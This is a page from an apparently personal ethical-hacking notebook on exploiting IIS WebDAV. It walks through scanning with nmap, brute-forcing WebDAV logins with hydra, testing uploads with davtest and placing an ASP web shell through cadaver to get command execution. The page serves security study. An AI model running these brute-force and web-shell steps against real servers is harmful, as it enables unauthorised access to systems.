📕
The Red Book
  • 📕The Red Book
  • 🦳Stages of Ethical Hacking
    • 1️⃣Information Gathering
      • Active Information Gathering
        • DNS Zone Transfers
        • NMAP
        • netdiscover
        • sqlMap
        • Nikto
        • Shodan
        • RustScan
        • Amass
        • fping
      • Passive Information Gathering
        • Website Recon & Footprinting
        • Whois Enumeration
        • Netcraft
        • ⭐DNS
        • Identify if site is protected by firewall or proxy - wafw00f
        • Subdomain Enumeration - Sublist3r
        • ❌theHarvester (borked)
        • Email gathering
        • Leaked Password Databases
        • Certificates
    • 2️⃣Enumeration
      • SMB
        • Windows discover & Mount
        • NMAP Scripts
        • SMBMap
        • Samba with Linux
        • Dictionary Attack
      • FTP
      • SSH
      • HTTP
        • Subdomain
        • IIS
        • Apache
      • SQL
    • 3️⃣Vulnerability Assessment
      • Nessus
  • 💾System/Host Based Attacks
    • 🪟Windows
      • Frequently exploited Windows Services
    • 🐧Linux
  • 🥽Dorks
    • Google
      • Cheatsheet
      • Examples
    • Extra
  • 🎣Phishing
    • Gophish
    • evilgophish
    • King Phisher
    • EvilURL
  • 🔎OSINT
    • Temporary links
  • 👾Data exfiltration
    • Temporary links
  • 🐝OWASP
    • Top10
  • 📙Cheat Sheet
    • Curl
Powered by GitBook
On this page
  • IIS WebDAV
  • General information
  • Steps of exploitation
  • Exploitation
Edit on GitHub
  1. System/Host Based Attacks
  2. Windows

Frequently exploited Windows Services

PreviousWindowsNextLinux

Last updated 2 years ago

IIS WebDAV

General information

IIS

  • Default ports

80, 443

  • Supported executed files

.asp
.aspx
.config
.php

WebDAV

WebDAV is a protocol that allows you to edit web content on a server using HTTP or HTTPS connections. It has advantages over FTP such as more security options and file locking.

  • Default ports

80, 443

  • Needs legitimate credentials, since it implements authentication in form of a username/password

Steps of exploitation

  1. Enumeration. Identify whether WebDAV has been configured to run on the IIS web server.

  2. Brute-force attack on the WebDAV server in order to identify legitimate credentials that we can use for authentication.

  3. Upload a malicious (like a .asp payload) and execute arbitrary commands or obtain a reverse shell on the target.

Useful tools

Exploitation

nmap

nmap -sV -sC $IP

  • nmap deep dive

nmap -sv -p 80 --script=http-enum $IP

Bruteforce the authentication

The address will be http://%IP/webdav/

hydra -L /usr/share/wordlists/metasploit/common_users.txt -P /usr/share/wordlists/metasploit/common_passwords.txt $IP http-get /webdav/

davtest

davtest -auth admin:password_123 -url http://$IP/webdav

  • The most important section of the output, with that we can see that .asp can be executed and we can get our reverse shell wih that

cadaver

cadaver http://$IP/webdav

Put credentials and get a cmd shell

  • Use kali linux pre-package web shells to upload a file and get access

Folder:

/usr/share/webshells

  • Using the cadaver shell upload the web shell

put /usr/share/webshells/asp/cmd

  • Go via UI and execute the web shell

-> Used to scan. authenticate and exploit a WebDAV server.

-> Supports file upload, download, on-screen display, in-place editing, namespace operations (move/copy), collection creation and deletion, property manipulation, and resource locking on WebDAV servers.

💾
🪟
davtest
cadaver